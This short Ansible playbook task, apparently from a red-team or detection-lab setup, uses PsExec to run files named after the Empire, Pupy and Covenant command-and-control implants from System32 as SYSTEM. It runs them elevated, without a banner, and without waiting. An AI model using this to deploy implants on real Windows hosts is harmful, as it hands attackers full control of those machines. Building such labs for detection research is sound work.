    - name:  Run Malware Files as System
      win_psexec:
        command: '{{ item }}'
        executable: C:\Windows\System32\PsExec.exe
        elevated: yes
        nobanner: yes
        system: yes
        interactive: yes
        wait: no
      with_items:
        - "C:\\Windows\\System32\\{{empire}}"
        - "C:\\Windows\\System32\\{{pupy}}"
        - "powershell.exe C:\\Windows\\System32\\{{covenant}}"